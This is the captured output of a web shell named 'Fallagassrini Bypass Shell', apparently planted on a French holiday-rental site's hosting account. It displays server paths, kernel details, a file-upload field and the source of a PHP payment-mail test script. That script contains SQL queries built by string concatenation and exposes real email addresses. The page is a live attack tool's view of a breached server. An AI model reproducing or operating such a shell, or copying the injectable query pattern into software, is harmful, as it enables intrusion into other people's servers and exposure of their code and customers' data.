Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/mangopay/OLD/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/mangopay/OLD/test_mail.php

<?php

session_start();
$page='paiement';
require_once 'config.php';
include("../config.php");
?>
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
	<head>
		<title>Module de paiement en ligne</title>
		<meta name='description' content=""/>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

		<link rel="icon" href="images/icone.ico"/>
		<!--[if lt IE 9]>
            <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
        <![endif]-->
		<link rel="stylesheet" href="design.css" type="text/css" media="screen" />
		<script type="text/javascript" src="js/prefixfree.js"></script>
	</head>
	
	<body>
		<header>
			
		</header>
		<section id="main-content">
			<p id="top"></p>
			<div>
				<div id="bloc-paiement">
					<p class="font11">
						<?




	

// ENVOI DU MAIL DE VALIDATION AU PROPRIETAIRE//
				//////////////////
				require "../includes/class.phpmailer.php";
				$_SESSION['reservation_id']=111;
				if ($_SESSION['reservation_id'])
				{
				

				
				
				$myquery = "SELECT * from reservation where id	=".$_SESSION['reservation_id'];
				$laresa = $db->get_row($myquery);
				$id_du_logement=$laresa->id_logement;
				$date1=$laresa->date1;
				$date2=$laresa->date2;
				$client_mail=$laresa->mail;
				
				
				$myquery = "SELECT * from logement where id	=".$id_du_logement;
				$lelogement = $db->get_row($myquery);
				$nom_logement=$lelogement->label;
				$nom_logement=utf8_decode($nom_logement);
				
				
				/* AJOUT  15/02/2016*/
				$myquery = "SELECT * from proprietaire where id=".$lelogement->id_proprietaire;
				$leproprietaire = $db->get_row($myquery);
				$proprietaire_mail=$leproprietaire->mail;
				$proprietaire_nom=$leproprietaire->nom;
				$proprietaire_prenom=$leproprietaire->prenom;
				/* FIN AJOUT  15/02/2016*/
					
				include('mailing_template_paiement_proprietaire.php');
				
				
				
				$objet="Confirmation paiement  ".$nom_logement." du ".date("j-m-Y", strtotime($date1))." au ".date("j-m-Y", strtotime($date2));
				$proprietaire_mail="phil_aph@hotmail.com";
				echo $proprietaire_mail."<br>";
				echo $objet;
				echo $message."<br>";
				
				
				//paiement
				$from="contact@happy-r.fr";
				$to_1="phil_aph@hotmail.com";
				$reply=$nom_du_mail;
				$mail = new PHPmailer();
				$mail->IsHTML(true);
				$mail->From=$from;
				$mail->AddAddress($to_1);
				$mail->AddReplyTo($reply);	
				$mail->Subject="paiement Mango";
				$mail->Body="message";
				if(!$mail->Send())
				{echo $mail->ErrorInfo;}
				else{echo '';}
				unset($mail);
				
				
				
				$from="contact@happy-r.fr";
				$to_1=$proprietaire_mail;
				$reply=$nom_du_mail;
				$mail = new PHPmailer();
				$mail->IsHTML(true);
				$mail->From=$from;
				$mail->AddAddress($to_1);
				//$mail->AddBCC("resa@happy-r.fr");
				$mail->AddReplyTo($reply);	
				$mail->Subject=$objet;
				$mail->Body=$message;
				if(!$mail->Send())
				{echo $mail->ErrorInfo;}
				else{echo '';}
				unset($mail);
				
				}
				
				

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net